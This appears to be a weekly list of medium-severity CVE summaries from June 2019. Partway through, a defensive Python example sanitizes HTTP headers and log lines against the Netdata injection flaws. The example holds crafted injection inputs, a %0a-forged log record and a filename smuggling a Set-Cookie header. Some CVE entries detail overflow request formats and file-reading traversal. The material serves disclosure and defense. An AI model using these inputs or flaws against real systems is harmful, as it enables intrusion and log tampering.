afian — filerun FileRun 2019.05.21 allows XSS via the filename to the ?module=fileman&section=do&page=up URI. 2019-06-20 4.3 CVE-2019-12905
MISC alpinelinux — abuild Alpine Linux abuild through 3.4.0 allows an unprivileged member of the abuild group to add an untrusted package via a –keys-dir option that causes acceptance of an untrusted signing key. 2019-06-18 4.0 CVE-2019-12875
MISC
MISC alternate-tools — alternate_pic_view Alternate Pic View 2.600 has a User Mode Write AV starting at PicViewer!PerfgrapFinalize+0x00000000000a8868. 2019-06-19 5.0 CVE-2019-12893
MISC alternate-tools — alternate_pic_view Alternate Pic View 2.600 has a Read Access Violation at the Instruction Pointer after a call from PicViewer!PerfgrapFinalize+0x00000000000a9a1b. 2019-06-19 5.0 CVE-2019-12894
MISC alternate-tools — alternate_pic_view In Alternate Pic View 2.600, the Exception Handler Chain is Corrupted starting at PicViewer!PerfgrapFinalize+0x00000000000b916d. 2019-06-19 5.0 CVE-2019-12895
MISC apache — allura In Apache Allura prior to 1.11.0, a vulnerability exists for stored XSS on the user dropdown selector when creating or editing tickets. The XSS executes when a user engages with that dropdown on that page. 2019-06-18 4.3 CVE-2019-10085
BID
MISC
MLIST artha_project — artha Artha ~ The Open Thesaurus 1.0.3.0 has a Buffer Overflow. 2019-06-18 5.0 CVE-2018-18944
MISC
MISC b3log — solo b3log Solo 2.9.3 has XSS in the Input page under the “Publish Articles” menu with an ID of “articleTags” stored in the “tag” JSON field, which allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name in an admin-authenticated HTTP request. 2019-06-20 4.3 CVE-2018-16248
MISC cisco — integrated_management_controller A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to access potentially sensitive system usage information. The vulnerability is due to a lack of proper data protection mechanisms. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow an attacker to view sensitive system data. 2019-06-19 5.0 CVE-2019-1631
BID
CISCO cisco — prime_service_catalog A vulnerability in the web-based management interface of Cisco Prime Service Catalog Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protection mechanisms on the web-based management interface on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. 2019-06-19 6.8 CVE-2019-1874
BID
CISCO cloudera — data_science_workbench An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.2.x through 1.4.0. Unauthenticated users can get a list of user accounts. 2019-06-21 5.0 CVE-2018-15665
MISC
CONFIRM columbiaweather — weather_microserver_firmware In firmware version MS_2.6.9900 of Columbia Weather MicroServer, a readouts_rd.php directory traversal issue makes it possible to read any file present on the underlying operating system. 2019-06-18 5.0 CVE-2018-18876
MISC
MISC columbiaweather — weather_microserver_firmware In firmware version MS_2.6.9900 of Columbia Weather MicroServer, an authenticated web user can access an alternative configuration page config_main.php that allows manipulation of the device. 2019-06-18 6.5 CVE-2018-18877
MISC
MISC columbiaweather — weather_microserver_firmware In firmware version MS_2.6.9900 of Columbia Weather MicroServer, an authenticated web user can pipe commands directly to the underlying operating system as user input is not sanitized in networkdiags.php. 2019-06-18 6.5 CVE-2018-18879
MISC
MISC corel — paintshop_pro_2019 An issue was discovered in Corel PaintShop Pro 2019 21.0.0.119. An integer overflow in the jp2 parsing library allows an attacker to overwrite memory and to execute arbitrary code. 2019-06-19 6.8 CVE-2019-6114
MISC craftcms — craft_cms Craft CMS 3.1.30 has XSS. 2019-06-18 4.3 CVE-2019-12823
MISC
CONFIRM creatiwity — witycms A “search for user discovery” injection issue exists in Creatiwity wityCMS 0.6.2 via the “Utilisateur” menu. No input parameters are filtered, e.g., the /admin/user/users Nickname, email, firstname, lastname, and groupe parameters. 2019-06-20 4.0 CVE-2018-16251
MISC debian — debian_linux An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.7, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. An attacker could send a malicious email to an OTRS system. If a logged-in agent user quotes it, the email could cause the browser to load external image resources. 2019-06-17 4.3 CVE-2019-12248
CONFIRM
MISC dotcms — dotcms dotCMS before 5.1.6 is vulnerable to a SQL injection that can be exploited by an attacker of the role Publisher via view_unpushed_bundles.jsp. 2019-06-18 6.5 CVE-2019-12872
MISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7.0 and earlier allows XML External Entity Blind Injection, related to pingback.axd and BlogEngine.Core/Web/HttpHandlers/PingbackHandler.cs. 2019-06-21 5.0 CVE-2019-10718
MISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714. 2019-06-21 6.5 CVE-2019-10719
MISC
FULLDISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution via the theme cookie to the File Manager. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714. 2019-06-21 6.5 CVE-2019-10720
MISC
FULLDISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7 and earlier allows XXE via an apml file to syndication.axd. 2019-06-21 5.0 CVE-2019-11392
MISC edrawsoft — edraw_max Edraw Max 7.9.3 has Heap Corruption starting at ntdll!RtlpNtMakeTemporaryKey+0x0000000000001a77. 2019-06-19 5.0 CVE-2019-12896
MISC edrawsoft — edraw_max Edraw Max 7.9.3 has a Read Access Violation at the Instruction Pointer after a call from ObjectModule!Paint::Clear+0x0000000000000074. 2019-06-19 5.0 CVE-2019-12897
MISC exacq — enterprise_system_manager A vulnerability in the exacqVision Enterprise System Manager (ESM) v5.12.2 application whereby unauthorized privilege escalation can potentially be achieved. This vulnerability impacts exacqVision ESM v5.12.2 and all prior versions of ESM running on a Windows operating system. This issue does not impact any Windows Server OSs, or Linux deployments with permissions that are not inherited from the root directory. Authorized Users have ?modify? permission to the ESM folders, which allows a low privilege account to modify files located in these directories. An executable can be renamed and replaced by a malicious file that could connect back to a bad actor providing system level privileges. A low privileged user is not able to restart the service, but a restart of the system would trigger the execution of the malicious file. This issue affects: Exacq Technologies, Inc. exacqVision Enterprise System Manager (ESM) Version 5.12.2 and prior versions; This issue does not affect: Exacq Technologies, Inc. exacqVision Enterprise System Manager (ESM) 19.03 and above. 2019-06-18 6.9 CVE-2019-7588
CONFIRM
MISC
MISC
CONFIRM f5 — big-ip_access_policy_manager Jonathan Looney discovered that the TCP retransmission queue implementation in tcp_fragment in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit f070ef2ac66716357066b683fb0baf55f8191a2e. 2019-06-18 5.0 CVE-2019-11478
MISC
MISC
MISC
MISC
CONFIRM
CONFIRM
MISC
CERT-VN f5 — big-ip_access_policy_manager Jonathan Looney discovered that the Linux kernel default MSS is hard-coded to 48 bytes. This allows a remote peer to fragment TCP resend queues significantly more than if a larger MSS were enforced. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commits 967c05aee439e6e5d7d805e195b3a20ef5c433d6 and 5f3e2bf008c2221478101ee72f5cb4654b9fc363. 2019-06-18 5.0 CVE-2019-11479
BID
MISC
MISC
MISC
MISC
CONFIRM
CONFIRM
MISC
CERT-VN fasterxml — jackson-databind A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. 2019-06-19 4.3 CVE-2019-12814
CONFIRM
MLIST
MLIST
MLIST
MLIST
MLIST foxitsoftware — foxit_pdf_sdk_activex A use after free in the TextBox field Validate action in IReader_ContentProvider can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031. An attacker can leverage this to gain remote code execution. Relative to CVE-2018-19452, this has a different free location and requires different JavaScript code for exploitation. 2019-06-17 6.8 CVE-2018-19444
MISC foxitsoftware — foxit_pdf_sdk_activex A command injection can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031 when the JavaScript API app.launchURL is used. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19445
MISC foxitsoftware — foxit_pdf_sdk_activex A File Write can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031 when the JavaScript API Doc.createDataObject is used. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19446
MISC foxitsoftware — foxit_pdf_sdk_activex A stack-based buffer overflow can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) 5.4.0.1031 when parsing the URI string. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19447
MISC foxitsoftware — foxit_pdf_sdk_activex In Foxit Reader SDK (ActiveX) Professional 5.4.0.1031, an uninitialized object in IReader_ContentProvider::GetDocEventHandler occurs when embedding the control into Office documents. By opening a specially crafted document, an attacker can trigger an out of bounds write condition, possibly leveraging this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19448
MISC foxitsoftware — foxit_pdf_sdk_activex A File Write can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031 when the JavaScript API Doc.exportAsFDF is used. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19449
MISC foxitsoftware — foxit_pdf_sdk_activex A command injection can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) 5.4.0.1031 when parsing a launch action. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19450
MISC fusionpbx — fusionpbx app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 suffers from an information disclosure vulnerability due to excessive debug information, which allows authenticated administrative attackers to obtain credentials and other sensitive information. 2019-06-17 4.0 CVE-2019-11407
MISC
MISC fusionpbx — fusionpbx XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript characters by placing a phone call using a specially crafted caller ID number. This can further lead to remote code execution by chaining this vulnerability with a command injection vulnerability also present in FusionPBX. 2019-06-17 4.3 CVE-2019-11408
MISC
MISC
MISC fusionpbx — fusionpbx app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation that allows authenticated non-administrative attackers to execute commands on the host. This can further lead to remote code execution when combined with an XSS vulnerability also present in the FusionPBX Operator Panel module. 2019-06-17 6.5 CVE-2019-11409
MISC
MISC
MISC genieaccess — wip3bvaf_firmware Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.x are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow. NOTE: this product is discontinued, and its final firmware version has this vulnerability (4.x versions exist only for other Genie Access products). 2019-06-17 5.0 CVE-2019-7315
MISC getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides a user with the capability of installing or deleting apps on the device using the web management interface. It seems that the device does not implement any cross-site request forgery protection mechanism which allows an attacker to trick a user who navigates to an attacker controlled page to install or delete an application on the device. Note: The cross-site request forgery is a systemic issue across all other functionalities of the device. 2019-06-17 6.8 CVE-2017-9381
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides UPnP services that are available on port 3480 and can also be accessed via port 80 using the url “/port_3480”. It seems that the UPnP services provide “file” as one of the service actions for a normal user to read a file that is stored under the /etc/cmh-lu folder. It retrieves the value from the “parameters” query string variable and then passes it to an internal function “FileUtils::ReadFileIntoBuffer” which is a library function that does not perform any sanitization on the value submitted and this allows an attacker to use directory traversal characters “../” and read files from other folders within the device. 2019-06-17 4.0 CVE-2017-9382
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides UPnP services that are available on port 3480 and can also be accessed via port 80 using the url “/port_3480”. It seems that the UPnP services provide “wget” as one of the service actions for a normal user to connect the device to an external website. It retrieves the parameter “URL” from the query string and then passes it to an internal function that uses the curl module on the device to retrieve the contents of the website. 2019-06-17 6.5 CVE-2017-9383
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera Veralite 1.7.481 devices. The device has an additional OpenWRT interface in addition to the standard web interface which allows the highest privileges a user can obtain on the device. This web interface uses root as the username and the password in the /etc/cmh/cmh.conf file which can be extracted by an attacker using a directory traversal attack, and then log in to the device with the highest privileges. 2019-06-17 5.0 CVE-2017-9385
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides a script file called “get_file.sh” which allows a user to retrieve any file stored in the “cmh-ext” folder on the device. However, the “filename” parameter is not validated correctly and this allows an attacker to directory traverse outside the /cmh-ext folder and read any file on the device. It is necessary to create the folder “cmh-ext” on the device which can be executed by an attacker first in an unauthenticated fashion and then execute a directory traversal attack. 2019-06-17 4.0 CVE-2017-9386
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides a shell script called connect.sh which is supposed to return a specific cookie for the user when the user is authenticated to https://home.getvera.com. One of the parameters retrieved by this script is “RedirectURL”. However, the application lacks strict input validation of this parameter and this allows an attacker to execute the client-side code on this application. 2019-06-17 4.3 CVE-2017-9390
MISC
MISC
BUGTRAQ gnu — bash A heap-based buffer overflow exists in GNU Bash before 4.3 when wide characters, not supported by the current locale set in the LC_CTYPE environment variable, are printed through the echo built-in function. A local attacker, who can provide data to print through the “echo -e” built-in function, may use this flaw to crash a script or execute code with the privileges of the bash process. This occurs because ansicstr() in lib/sh/strtrans.c mishandles u32cconv(). 2019-06-18 4.6 CVE-2012-6711
MISC
BID
MISC google — android In publishKeyEvent, publishMotionEvent and sendUnchainedFinishedSignal of InputTransport.cpp, there are uninitialized data leading to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9Android ID: A-115739809 2019-06-19 4.9 CVE-2019-2004
MISC google — android In onPermissionGrantResult of GrantPermissionsActivity.java, there is a possible incorrectly granted permission due to a missing permission check. This could lead to local escalation of privilege on a locked device with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-68777217 2019-06-19 6.8 CVE-2019-2005
MISC i-doit — i-doit An XSS issue was discovered in i-doit Open 1.12 via the src/tools/php/qr/qr.php url parameter. 2019-06-18 4.3 CVE-2019-6965
MISC ibm — campaign IBM Campaign 9.1.2 and 10.1 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 162172. 2019-06-19 4.0 CVE-2019-4384
XF
CONFIRM ibm — cloud_private IBM Cloud Private 2.1.0, 3.1.0, 3.1.1, and 3.1.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 158338. 2019-06-18 6.8 CVE-2019-4142
XF
CONFIRM ibm — cognos_controller IBM Cognos Controller 10.2.0, 10.2.1, 10.3.0, 10.3.1, and 10.4.0 could allow a remote attacker to obtain sensitive information, caused by a flaw in the HTTP OPTIONS method, aka Optionsbleed. By sending an OPTIONS HTTP request, a remote attacker could exploit this vulnerability to read secret data from process memory and obtain sensitive information. IBM X-Force ID: 158878. 2019-06-17 4.0 CVE-2019-4173
CONFIRM
XF ibm — cognos_controller IBM Cognos Controller 10.2.0, 10.2.1, 10.3.0, 10.3.1, and 10.4.0 could allow a remote attacker to bypass security restrictions, caused by an error related to insecure HTTP Methods. An attacker could exploit this vulnerability to gain access to the system. IBM X-Force ID: 158881. 2019-06-17 5.0 CVE-2019-4176
CONFIRM
XF ibm — infosphere_governance_catalog IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150905. 2019-06-17 5.5 CVE-2018-1845
XF
CONFIRM ibm — marketing_platform IBM Marketing Platform 9.1.0, 9.1.2, 10.0, and 10.1 exposes sensitive information in the headers that could be used by an authenticated attacker in further attacks against the system. IBM X-Force ID: 120906. 2019-06-19 4.0 CVE-2017-1107
XF
CONFIRM ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that any malicious user connecting to the device can change the default SSID and password thereby denying the owner an access to his/her own device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. 2019-06-17 4.0 CVE-2017-10718
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the device has default Wi-Fi credentials that are exactly the same for every device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. 2019-06-17 4.0 CVE-2017-10719
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the desktop application used to connect to the device suffers from a stack overflow if more than 26 characters are passed to it as the Wi-Fi name. This application is installed on the device and an attacker who can provide the right payload can execute code on the user’s system directly. Any breach of this system can allow an attacker to get access to all the data that the user has access too. The application uses a dynamic link library(DLL) called “avilib.dll” which is used by the application to send binary packets to the device that allow to control the device. One such action that the DLL provides is change password in the function “sendchangename” which allows a user to change the Wi-Fi name on the device. This function calls a sub function “sub_75876EA0” at address 0x758784F8. The function determines which action to execute based on the parameters sent to it. The “sendchangename” passes the datastring as the second argument which is the name we enter in the textbox and integer 1 as first argument. The rest of the 3 arguments are set to 0. The function “sub_75876EA0” at address 0x75876F19 uses the first argument received and to determine which block to jump to. Since the argument passed is 1, it jumps to 0x75876F20 and proceeds from there to address 0x75876F56 which calculates the length of the data string passed as the first parameter. This length and the first argument are then passed to the address 0x75877001 which calls the memmove function which uses a stack address as the destination where the password typed by us is passed as the source and length calculated above is passed as the number of bytes to copy which leads to a stack overflow. 2019-06-17 4.6 CVE-2017-10720
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the device has Telnet functionality enabled by default. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. 2019-06-17 4.0 CVE-2017-10721
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the desktop application used to connect to the device suffers from a stack overflow if more than 26 characters are passed to it as the Wi-Fi password. This application is installed on the device and an attacker who can provide the right payload can execute code on the user’s system directly. Any breach of this system can allow an attacker to get access to all the data that the user has access too. The application uses a dynamic link library(DLL) called “avilib.dll” which is used by the application to send binary packets to the device that allow to control the device. One such action that the DLL provides is change password in the function “sendchangepass” which allows a user to change the Wi-Fi password on the device. This function calls a sub function “sub_75876EA0” at address 0x7587857C. The function determines which action to execute based on the parameters sent to it. The “sendchangepass” passes the datastring as the second argument which is the password we enter in the textbox and integer 2 as first argument. The rest of the 3 arguments are set to 0. The function “sub_75876EA0” at address 0x75876F19 uses the first argument received and to determine which block to jump to. Since the argument passed is 2, it jumps to 0x7587718C and proceeds from there to address 0x758771C2 which calculates the length of the data string passed as the first parameter.This length and the first argument are then passed to the address 0x7587726F which calls a memmove function which uses a stack address as the destination where the password typed by us is passed as the source and length calculated above is passed as the number of bytes to copy which leads to a stack overflow. 2019-06-17 4.6 CVE-2017-10722
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that an attacker connected to the device Wi-Fi SSID can exploit a memory corruption issue and execute remote code on the device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. The firmware contains binary uvc_stream that is the UDP daemon which is responsible for handling all the UDP requests that the device receives. The client application sends a UDP request to change the Wi-Fi name which contains the following format: “SETCMD0001+0001+[2 byte length of wifiname]+[Wifiname]. This request is handled by “control_Dev_thread” function which at address “0x00409AE0” compares the incoming request and determines if the 10th byte is 01 and if it is then it redirects to 0x0040A74C which calls the function “setwifiname”. The function “setwifiname” uses a memcpy function but uses the length of the payload obtained by using strlen function as the third parameter which is the number of bytes to copy and this allows an attacker to overflow the function and control the $PC value. 2019-06-17 6.5 CVE-2017-10723
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that an attacker connected to the device Wi-Fi SSID can exploit a memory corruption issue and execute remote code on the device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. The firmware contains binary uvc_stream that is the UDP daemon which is responsible for handling all the UDP requests that the device receives. The client application sends a UDP request to change the Wi-Fi name which contains the following format: “SETCMD0001+0002+[2 byte length of wifipassword]+[Wifipassword]. This request is handled by “control_Dev_thread” function which at address “0x00409AE4” compares the incoming request and determines if the 10th byte is 02 and if it is then it redirects to 0x0040A7D8, which calls the function “setwifipassword”. The function “setwifipassword” uses a memcpy function but uses the length of the payload obtained by using strlen function as the third parameter which is the number of bytes to copy and this allows an attacker to overflow the function and control the $PC value. 2019-06-17 6.5 CVE-2017-10724
MISC
MISC
BUGTRAQ jspxcms — jspxcms In Jspxcms 9.0.0, a vulnerable URL routing implementation allows remote code execution after logging in as web admin. 2019-06-20 6.5 CVE-2018-16553
MISC
MISC kcodes — netusb.ko An exploitable arbitrary memory read vulnerability exists in the KCodes NetUSB.ko kernel module which enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. A specially crafted index value can cause an invalid memory read, resulting in a denial of service or remote information disclosure. An unauthenticated attacker can send a crafted packet on the local network to trigger this vulnerability. 2019-06-17 6.4 CVE-2019-5016
BID
MISC kcodes — netusb.ko An exploitable information disclosure vulnerability exists in the KCodes NetUSB.ko kernel module that enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. An unauthenticated, remote attacker can craft and send a packet containing an opcode that will trigger the kernel module to return several addresses. One of which can be used to calculate the dynamic base address of the module for further exploitation. 2019-06-17 5.0 CVE-2019-5017
BID
MISC linksys — wrt1900acs_firmware An issue was discovered on Linksys WRT1900ACS 1.0.3.187766 devices. An ability exists for an unauthenticated user to browse a confidential ui/1.0.99.187766/dynamic/js/setup.js.localized file on the router’s webserver, allowing for an attacker to identify possible passwords that the system uses to set the default guest network password. An attacker can use this list of 30 words along with a random 2 digit number to brute force their access onto a router’s guest network. 2019-06-17 5.0 CVE-2019-7579
MISC
MISC linux — linux_kernel i915_gem_userptr_get_pages in drivers/gpu/drm/i915/i915_gem_userptr.c in the Linux kernel 4.15.0 on Ubuntu 18.04.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) or possibly have unspecified other impact via crafted ioctl calls to /dev/dri/card0. 2019-06-18 4.6 CVE-2019-12881
MISC misp — misp app/Model/Server.php in MISP 2.4.109 allows remote command execution by a super administrator because the PHP file_exists function is used with user-controlled entries, and phar:// URLs trigger deserialization. 2019-06-17 6.5 CVE-2019-12868
MISC my-netdata — netdata An issue was discovered in Netdata 1.10.0. JSON injection exists via the api/v1/data tqx parameter because of web_client_api_request_v1_data in web/api/web_api_v1.c. 2019-06-18 4.3 CVE-2018-18836
MISC
MISC
MISC
CONFIRM
MISC my-netdata — netdata An issue was discovered in Netdata 1.10.0. HTTP Header Injection exists via the api/v1/data filename parameter because of web_client_api_request_v1_data in web/api/web_api_v1.c. 2019-06-18 5.8 CVE-2018-18837
MISC
MISC
CONFIRM
MISC my-netdata — netdata An issue was discovered in Netdata 1.10.0. Log Injection (or Log Forgery) exists via a %0a sequence in the url parameter to api/v1/registry. 2019-06-18 5.0 CVE-2018-18838
MISC
CONFIRM
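The two Netdata entries above for api/v1/data (HTTP header injection via the filename parameter) and api/v1/registry (log injection via a %0a sequence in the url parameter) share one root cause: attacker-controlled bytes containing CR or LF reach a line-oriented sink, a response header or a log file. The following is an added example of the two checks a practitioner would put in front of those sinks; it is not Netdata's code, and the function names, the allowed filename character set and the log line layout are assumptions made for the example.

```python
import re
import urllib.parse

# Allowed filename characters for a Content-Disposition value (assumed policy):
# ASCII letters, digits, dot, underscore, hyphen; no quotes, no separators, no CTLs.
_SAFE_FILENAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def content_disposition(filename: str) -> str:
    """Build a Content-Disposition header value from an untrusted filename.

    CR, LF and NUL are rejected first because any of them can terminate the
    header and let the attacker start a new one (header injection); the
    whitelist then removes the quote and separator cases.
    """
    if "\r" in filename or "\n" in filename or "\x00" in filename:
        raise ValueError("control characters in filename")
    if not _SAFE_FILENAME.match(filename):
        raise ValueError("filename outside the allowed character set")
    return f'attachment; filename="{filename}"'


def sanitize_log_field(raw: str) -> str:
    """Make an attacker-controlled value safe for a one-line-per-event log.

    The value is URL-decoded first, which is where %0a becomes a real newline,
    then every control byte, DEL and non-ASCII character is rendered as \\xNN
    and backslash is doubled, so a forged 'second line' stays visibly inside
    the original record instead of becoming a record of its own.
    """
    decoded = urllib.parse.unquote(raw)
    out = []
    for ch in decoded:
        if ch == "\\":
            out.append("\\\\")
        elif 0x20 <= ord(ch) < 0x7F:
            out.append(ch)
        else:
            out.append(f"\\x{ord(ch):02x}")
    return "".join(out)


def registry_log_line(client_ip: str, url_param: str) -> str:
    """One registry access record in an assumed key=value log format."""
    return f'registry access ip={client_ip} url="{sanitize_log_field(url_param)}"'


# Constructed sample input: a %0a followed by a fake record that would appear
# as a separate, legitimate-looking log line if written unsanitized.
FORGED_URL = 'http://example.test/%0aregistry access ip=10.0.0.1 url="admin-ok"'

if __name__ == "__main__":
    print(registry_log_line("203.0.113.5", FORGED_URL))
    print(content_disposition("chart.csv"))
    try:
        content_disposition("x.csv\r\nSet-Cookie: a=b")
    except ValueError as err:
        print("rejected:", err)
```

The log sanitizer escapes rather than strips, so a forensic reader can still see that the client sent a newline; stripping would hide the attempt. The header builder rejects rather than escapes, because there is no safe way to quote a newline inside an HTTP/1.1 header value.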
MISC my-netdata — netdata ** DISPUTED ** An issue was discovered in Netdata 1.10.0. Full Path Disclosure (FPD) exists via api/v1/alarms. NOTE: the vendor says “is intentional.” 2019-06-18 5.0 CVE-2018-18839
MISC
MISC
MISC nagios — nagios_xi An Insufficient Access Control vulnerability (leading to credential disclosure) in coreconfigsnapshot.php (aka configuration snapshot page) in Nagios XI before 5.5.4 allows remote attackers to gain access to configuration files containing confidential credentials. 2019-06-19 5.0 CVE-2018-17148
MISC ngahr — resourcelink NGA ResourceLink 20.0.2.1 allows local file inclusion. 2019-06-19 4.0 CVE-2018-18863
MISC open-xchange — open-xchange_appsuite OX App Suite 7.10.1 and earlier allows Information Exposure. 2019-06-18 5.0 CVE-2019-7159
MISC
MISC openfind — mail2000 An issue was discovered in Openfind Mail2000 v6 Webmail. XSS can occur via an ‘<object data=”data:text/html’ substring in an e-mail message (The vendor subsequently patched this). 2019-06-19 4.3 CVE-2019-9763
MISC otrs — otrs An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.8, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. In the customer or external frontend, personal information of agents (e.g., Name and mail address) can be disclosed in external notes. 2019-06-17 5.0 CVE-2019-12497
MISC
CONFIRM php — php When using the gdImageCreateFromXbm() function of the PHP gd extension in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6, it is possible to supply data that will cause the function to use the value of an uninitialized variable. This may disclose stack contents left there by previous code. 2019-06-18 5.0 CVE-2019-11038
CONFIRM php — php Function iconv_mime_decode_headers() in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 may perform out-of-buffer read due to integer overflow when parsing MIME headers. This may lead to information disclosure or crash. 2019-06-18 6.4 CVE-2019-11039
